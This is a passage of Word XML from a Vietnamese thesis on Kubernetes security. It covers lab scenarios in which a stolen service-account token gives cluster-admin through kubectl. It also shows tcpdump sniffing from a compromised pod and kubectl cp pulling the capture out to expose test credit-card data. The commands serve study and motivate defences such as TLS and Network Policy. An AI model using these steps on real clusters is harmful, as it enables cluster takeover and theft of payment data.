    </w:p>
    <w:p w14:paraId="7A734C59" w14:textId="593C3691" w:rsidR="001B00BF" w:rsidRPr="008A233C" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc233498151"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>. Token bị hacker lấy được trong quá trình khai thác</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="3444EAAB" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="008A233C" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="008A233C">
        <w:t>Kẻ tấn công sao chép (Copy) toàn bộ chuỗi token siêu dài mã hóa dạng JWT (bắt đầu bằng eyJ...) hiển thị trên màn hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB712B" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="009823E1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="00690E86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cấu hình Kubectl từ xa trên máy Kali:</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E86">
        <w:t xml:space="preserve"> Mở một Terminal độc lập trên máy Kali Linux, kẻ tấn công nạp Token trộm được và IP thật của API Server (Master Node) vào biến môi trường:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6170AA" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00A55D11" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="00A55D11">
        <w:lastRenderedPageBreak/>
        <w:t>Chiếm quyền điều khiển thực tế: Kẻ tấn công ra lệnh cho cụm K3s thông qua công cụ kubectl.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B00BF" w14:paraId="4673BA35" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0E2BEEC5" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00690E86" w:rsidRDefault="001B00BF" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00690E86">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>kubectl --server=$MASTER_URL --token=$TOKEN --insecure-skip-tls-verify get nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60BB5766" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00D64E0A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc233498112"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Kết quả thực nghiệm đạt được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="0E14BD39" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00E706D1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="009823E1">
        <w:t>Màn hình máy Kali Linux in ra danh sách toàn bộ các node master01 và worker01 ở trạng thái Ready. Với quyền cluster-admin có được, tin tặc đã chiếm quyền kiểm soát tối cao toàn bộ Cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CABED07" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00D64E0A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc233498113"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Kịch bản TN-03: Tấn công liên quan đến lớp mạng mạng nội bộ (Container Networking)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="7AB0FDA8" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00D64E0A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc233498114"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="7300073F" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r>
        <w:t>Khai thác kiến trúc mạng phẳng mặc định (không có tường lửa cô lập Pod) để tiến hành bắt và phân tích gói tin (Sniffing), đánh cắp thông tin thẻ tín dụng nhạy cảm truyền tải dưới dạng văn bản thô (Plaintext) giữa các dịch vụ vi mô lân cận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6322E768" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00D64E0A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc233498115"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Cấu trúc dịch vụ giả lập phục vụ Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="4D1473CC" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00E706D1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hệ thống bổ sung một microservice ngầm mang tên </w:t>
      </w:r>
      <w:r w:rsidRPr="0043452B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>payment-service</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AB2BFB" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00D64E0A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc233498116"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Quy trình thực hiện chi tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="55C311FA" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00DD1DE0" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cài đặt công cụ bắt gói tin</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1DE0">
        <w:t>: Tại phiên shell tương tác của Pod Frontend (nc), kẻ tấn công thực hiện cập nhật và cài đặt công cụ phân tích mạng:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B00BF" w14:paraId="7CE2EF7C" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="37957CD6" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00DD1DE0" w:rsidRDefault="001B00BF" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1DE0">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>apt-get update &amp;&amp; apt-get install -y tcpdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="290A6EC5" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00010541" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kích hoạt cắm chốt bắt dữ liệu:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:t xml:space="preserve"> Kẻ tấn công ra lệnh cho tcpdump ghi lại toàn bộ lưu lượng di chuyển qua card mạng eth0 của Pod và xuất ra file định dạng pcap:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B00BF" w14:paraId="3FAB635A" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="104845D3" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00EC7C59" w:rsidRDefault="001B00BF" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>tcpdump -i eth0 -w /tmp/network_traffic.pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D0F5A46" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giả lập giao dịch người dùng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Từ máy Kali, mở trình duyệt truy cập giao diện ứng dụng mục tiêu, điền thông tin thẻ tín dụng (ví dụ: 4111-2222-3333-4444, CVV </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">123) vào form </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Cổng Thanh toán Đơn hàng nội bộ"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rồi bấm </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác nhận Thanh toán (Checkout)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4106FC75" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="009823E1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trích xuất file PCAP về máy tấn công:</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve"> Quay lại shell nc, bấm Ctrl+C để dừng tcpdump. Tại máy Kali Linux, dùng quyền Admin (có được từ bài TN-02) để kéo file pcap ra ngoài máy vật lý:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B00BF" w14:paraId="30A509BF" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="440FE3DA" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00EC7C59" w:rsidRDefault="001B00BF" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>kubectl --server=$MASTER_URL --token=$TOKEN --insecure-skip-tls-verify cp default/&lt;POD_FRONTEND&gt;:/tmp/network_traffic.pcap ./network_traffic.pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4673BF46" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00B427E4" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="00B427E4">
        <w:t>Phân tích bằng Wireshark: Mở file bằng công cụ Wireshark trên Kali (wireshark network_traffic.pcap), lọc giao thức http, bấm chuột phải vào gói tin /charge chọn Follow -&gt; HTTP Stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617DC6EE" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="003F402A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D0A063E" wp14:editId="549E2016">
            <wp:extent cx="5170210" cy="3016250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121127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63" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5170927" cy="3016668"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="314584E2" w14:textId="584BEFFE" w:rsidR="001B00BF" w:rsidRPr="00B427E4" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc233498155"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B427E4">
        <w:t>. Kết quá quá trình khai thác là thông tin thẻ tín dụng của người dùng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="5307A592" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00D64E0A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc233498117"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Kết quả thực nghiệm đạt được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="6767B937" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00FA4830" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Toàn bộ thông tin nhạy cảm của người dùng bao gồm số thẻ tín dụng, mã bảo mật CVV và số tiền giao dịch hiển thị rõ mồn một dưới dạng văn bản thuần (Plaintext). Thực nghiệm chứng minh sự nguy hiểm của cấu hình mạng mặc định </w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:lastRenderedPageBreak/>
        <w:t>trong Kubernetes: chỉ cần một Pod hướng ngoài bị hack, toàn bộ dữ liệu truyền thông nội bộ của các Pod lân cận đều có nguy cơ bị nghe lén nếu thiếu cơ chế mã hóa TLS và Network Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11395165" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="003D12D0" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết luận chương</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF43E12" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00FA4830" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="003D12D0">
        <w:t>Chương 3 đã hoàn thành việc xây dựng môi trường thực nghiệm với các kịch bản tấn công giả định (PoC) đại diện cho những mối đe dọa thực tế nhất đối với hạ tầng container. Kết quả thực chứng từ ba kịch bản TN-01, TN-02 và TN-03 đã làm sáng tỏ cơ chế leo thang từ lỗi cấu hình sai đặc quyền (privileged) đến việc chiếm quyền Cluster Admin thông qua đánh cắp định danh (Service Account Token) và khai thác mạng phẳng để nghe lén lưu lượng. Những minh chứng này không chỉ khẳng định tính dễ tổn thương của các thiết lập mặc định mà còn cung cấp dữ liệu quan trọng để định hình các yêu cầu phòng thủ trong chương tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7801C" w14:textId="2CCAD06B" w:rsidR="00026BE1" w:rsidRPr="000A54C5" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A54C5">
        <w:t>Giới thiệu chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="681AD761" w14:textId="682F1245" w:rsidR="00026BE1" w:rsidRPr="0056158A" w:rsidRDefault="00204C0D" w:rsidP="003D225F">
      <w:r w:rsidRPr="0056158A">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00026BE1" w:rsidRPr="0056158A">
        <w:t>hương 2</w:t>
      </w:r>
      <w:r w:rsidR="00CA45BC" w:rsidRPr="0056158A">
        <w:t xml:space="preserve"> học viên</w:t>
      </w:r>
      <w:r w:rsidR="00026BE1" w:rsidRPr="0056158A">
        <w:t xml:space="preserve"> sẽ tập trung phân tích sâu các lỗ hổng bảo mật phổ biến, các lỗi cấu hình sai lệch và các kẽ hở kiến trúc đặc thù trên từng phân lớp cấu phần: bắt đầu từ các lỗ hổng ẩn giấu trong tệp tin ảnh </w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t>Container</w:t>
      </w:r>
      <w:r w:rsidR="00026BE1" w:rsidRPr="0056158A">
        <w:t xml:space="preserve">, các rủi ro thoát cô lập tại trình thực thi </w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t>Container runtime</w:t>
      </w:r>
      <w:r w:rsidR="00026BE1" w:rsidRPr="0056158A">
        <w:t xml:space="preserve">, các lỗi phân quyền </w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t>yếu, chưa chặt chẽ</w:t>
      </w:r>
      <w:r w:rsidR="00026BE1" w:rsidRPr="0056158A">
        <w:t xml:space="preserve"> tại </w:t>
      </w:r>
      <w:r w:rsidRPr="0056158A">
        <w:t>giải pháp điều phối</w:t>
      </w:r>
      <w:r w:rsidR="00026BE1" w:rsidRPr="0056158A">
        <w:t xml:space="preserve"> Kubernetes, và cuối cùng là các thách thức an ninh tại phân lớp kiến trúc mạng liên kết nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C583FF" w14:textId="1642AA54" w:rsidR="00026BE1" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc235976355"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lỗ hổng bảo mật trong Container Image và chuỗi cung ứng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="5295C159" w14:textId="251242DB" w:rsidR="00CA45BC" w:rsidRPr="00DE4E85" w:rsidRDefault="00CA45BC" w:rsidP="00CA45BC">
      <w:r w:rsidRPr="00CA45BC">
        <w:t>Sự phát triển của kiến trúc container hóa gắn liền với việc gia tăng mức độ phụ thuộc vào các thành phần mã nguồn mở thượng nguồn. Kẻ tấn công hiện nay không còn chỉ tập trung tìm kiếm các lỗ hổng bảo mật đơn lẻ sau khi hệ thống đã vận hành, mà chuyển dịch trọng tâm sang việc thao túng tính toàn vẹn của phần mềm ngay từ giai đoạn phát triển và đóng gói chuỗi cung ứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557417E5" w14:textId="77777777" w:rsidR="00FC61AA" w:rsidRDefault="00197171" w:rsidP="00FC61AA">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00197171">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B42BA13" wp14:editId="693FF668">
            <wp:extent cx="4718050" cy="2154523"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1529424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32914" cy="2161311"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40243538" w14:textId="0B623324" w:rsidR="00CA45BC" w:rsidRPr="00FC61AA" w:rsidRDefault="00FC61AA" w:rsidP="00FC61AA">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc236001524"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</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14</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FC61AA">
        <w:t>. Luồng tấn công vào cont</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ainer image và chuỗi cung ứng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="7C65ACB8" w14:textId="5550C840" w:rsidR="00026BE1" w:rsidRPr="00FC61AA" w:rsidRDefault="00026BE1" w:rsidP="00CA45BC">
      <w:r w:rsidRPr="00FC61AA">
        <w:t>Bề mặt tấn công đầu tiên và phổ biến nhất nằm ở giai đoạn xây dựng và phân phối tệp tin ảnh đóng gói ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="00197171" w:rsidRPr="00FC61AA">
        <w:t xml:space="preserve"> dưới đây là các rủi ro chính dẫn đến các nguy cơ mất an toàn thông tin tiềm ẩn trong container image và chuỗi cung ứng.</w:t>
      </w:r>
    </w:p>
